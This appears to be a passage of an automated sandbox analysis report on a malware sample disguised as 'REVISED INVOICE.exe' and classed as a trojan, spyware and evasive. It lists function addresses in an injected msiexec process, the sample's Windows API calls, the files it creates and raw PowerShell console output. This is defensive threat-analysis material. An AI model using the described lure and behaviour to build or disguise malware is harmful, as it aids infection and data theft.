          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215817385_2_21581738
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215857385_2_21585738
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215887395_2_21588739
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21589F305_2_21589F30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158F5305_2_2158F530
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215817295_2_21581729
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21589F265_2_21589F26
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21581BD05_2_21581BD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158BBD05_2_2158BBD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21585BD15_2_21585BD1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158D3C85_2_2158D3C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21581BC15_2_21581BC1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21583BF85_2_21583BF8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158A3F85_2_2158A3F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21580DF85_2_21580DF8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21587BF85_2_21587BF8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21588BFF5_2_21588BFF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158F9F75_2_2158F9F7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158A3E85_2_2158A3E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21583BEA5_2_21583BEA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21585BE05_2_21585BE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158BBE05_2_2158BBE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158699A5_2_2158699A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158AD885_2_2158AD88
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158298A5_2_2158298A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158958F5_2_2158958F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215849805_2_21584980
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158D3B85_2_2158D3B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158EBB05_2_2158EBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215869A85_2_215869A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215895A05_2_215895A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158EBA15_2_2158EBA1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215820585_2_21582058
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21589A585_2_21589A58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215840505_2_21584050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158B2505_2_2158B250
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215800405_2_21580040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21586E405_2_21586E40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215840405_2_21584040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158B2405_2_2158B240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215860785_2_21586078
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158F0785_2_2158F078
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215820685_2_21582068
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21589A685_2_21589A68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215860685_2_21586068
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158F0675_2_2158F067
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21584E185_2_21584E18
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21588C105_2_21588C10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158E2115_2_2158E211
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21580E085_2_21580E08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21587C085_2_21587C08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158FA085_2_2158FA08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21584E085_2_21584E08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158CA385_2_2158CA38
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21582E305_2_21582E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21586E305_2_21586E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158CA325_2_2158CA32
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158E2205_2_2158E220
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21582E225_2_21582E22
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215804D85_2_215804D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215872D85_2_215872D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215890D85_2_215890D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215844DA5_2_215844DA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158E6DA5_2_2158E6DA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215832C85_2_215832C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215804C85_2_215804C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215872C85_2_215872C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215890CA5_2_215890CA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158A8C05_2_2158A8C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215824F05_2_215824F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215844E85_2_215844E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158E6E85_2_2158E6E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158CEEF5_2_2158CEEF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158D8905_2_2158D890
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215880905_2_21588090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158C0975_2_2158C097
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158D8805_2_2158D880
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215832BA5_2_215832BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215852B05_2_215852B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158A8B05_2_2158A8B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158C0A85_2_2158C0A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215812A05_2_215812A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215880A05_2_215880A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215852A05_2_215852A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C7D405_2_215C7D40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C19405_2_215C1940
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C4B405_2_215C4B40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C03605_2_215C0360
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C35605_2_215C3560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C67605_2_215C6760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C77005_2_215C7700
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C13005_2_215C1300
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C45005_2_215C4500
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C93205_2_215C9320
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C2F205_2_215C2F20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C61205_2_215C6120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C89C05_2_215C89C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C25C05_2_215C25C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C57C05_2_215C57C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C5DEF5_2_215C5DEF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C73E05_2_215C73E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C0FE05_2_215C0FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C41E05_2_215C41E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C83805_2_215C8380
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C1F805_2_215C1F80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C51805_2_215C5180
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C89B05_2_215C89B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C09A05_2_215C09A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C3BA05_2_215C3BA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C6DA05_2_215C6DA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C96405_2_215C9640
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C00405_2_215C0040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C32405_2_215C3240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C64405_2_215C6440
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C38705_2_215C3870
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C80605_2_215C8060
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C1C605_2_215C1C60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C4E605_2_215C4E60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C90005_2_215C9000
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C2C005_2_215C2C00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C5E005_2_215C5E00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C96305_2_215C9630
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C64325_2_215C6432
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C7A205_2_215C7A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C16205_2_215C1620
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C48205_2_215C4820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C8CD05_2_215C8CD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C70C05_2_215C70C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C0CC05_2_215C0CC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C3EC05_2_215C3EC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C8CE05_2_215C8CE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C28E05_2_215C28E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C5AE05_2_215C5AE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C06805_2_215C0680
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C38805_2_215C3880
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C6A805_2_215C6A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C86A05_2_215C86A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C22A05_2_215C22A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C54A05_2_215C54A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169A5E85_2_2169A5E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169CB685_2_2169CB68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216913605_2_21691360
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169E1485_2_2169E148
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169AF485_2_2169AF48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21692B485_2_21692B48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169134F5_2_2169134F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169C5285_2_2169C528
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169F7285_2_2169F728
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21692B385_2_21692B38
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169DB085_2_2169DB08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169A9085_2_2169A908
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216905085_2_21690508
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169D7E85_2_2169D7E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169BBC85_2_2169BBC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169EDC85_2_2169EDC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216909C05_2_216909C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216909D05_2_216909D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169D1A85_2_2169D1A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216921AA5_2_216921AA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216939A05_2_216939A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216921B85_2_216921B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169B5885_2_2169B588
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169E7885_2_2169E788
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216939905_2_21693990
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169B2685_2_2169B268
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21693E685_2_21693E68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169E4685_2_2169E468
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216926715_2_21692671
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169C8485_2_2169C848
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169FA485_2_2169FA48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216900405_2_21690040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21693E575_2_21693E57
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169AC285_2_2169AC28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216918285_2_21691828
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169DE285_2_2169DE28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169FA385_2_2169FA38
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169C2085_2_2169C208
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169F4085_2_2169F408
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216930005_2_21693000
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216918185_2_21691818
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216930105_2_21693010
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169BEE85_2_2169BEE8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169F0E85_2_2169F0E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216904F85_2_216904F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21691CF05_2_21691CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169D4C85_2_2169D4C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216934C75_2_216934C7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216934D85_2_216934D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21691CDF5_2_21691CDF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169EAA85_2_2169EAA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169B8A85_2_2169B8A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169CE885_2_2169CE88
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21690E8A5_2_21690E8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216926805_2_21692680
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21690E985_2_21690E98
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21722E785_2_21722E78
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217235585_2_21723558
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21723C385_2_21723C38
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217243185_2_21724318
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217249F85_2_217249F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217250D85_2_217250D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217257B85_2_217257B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21722E685_2_21722E68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217200405_2_21720040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217235485_2_21723548
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217221305_2_21722130
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217221215_2_21722121
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21723C295_2_21723C29
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21722B005_2_21722B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217243085_2_21724308
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217249E85_2_217249E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21720ED85_2_21720ED8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21720EC95_2_21720EC9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217250C95_2_217250C9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217257A85_2_217257A8
          Source: REVISED INVOICE.exeStatic PE information: invalid certificate
          Source: REVISED INVOICE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/16@28/8
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_0040457E GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040457E
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeFile created: C:\Program Files (x86)\Common Files\Hemicrane.iniJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeFile created: C:\Users\user\AppData\Local\fonaJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeFile created: C:\Users\user\AppData\Local\Temp\nsrC65B.tmpJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................D........%.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................D........%.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................s.t.r.i.n.g.....................H........%.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........&.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.3.6........&.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H......."&.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H.......4&.........................s....................^.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................D.......A&.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................D.......U&.........................s....................^.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......b&.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......t&.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .l.i.d.a.t.i.o.n.E.x.c.e.p.t.i.o.n..&.........................s............8.......(.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&.........................s....................l.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................&.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h........(.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h........(.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4........(.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h........(.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h........(.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........(.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........(.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................(.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h........).........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h........).........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h.......').........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h.......3).........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................4.......H).........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......T).........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................z).........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................).........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4........).........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................).........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................).........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h........).........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................).........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................).........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................).........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................*.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................*.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......+*.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................h.......?*.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......L*.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................*.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................*.........................s............8...............................Jump to behavior
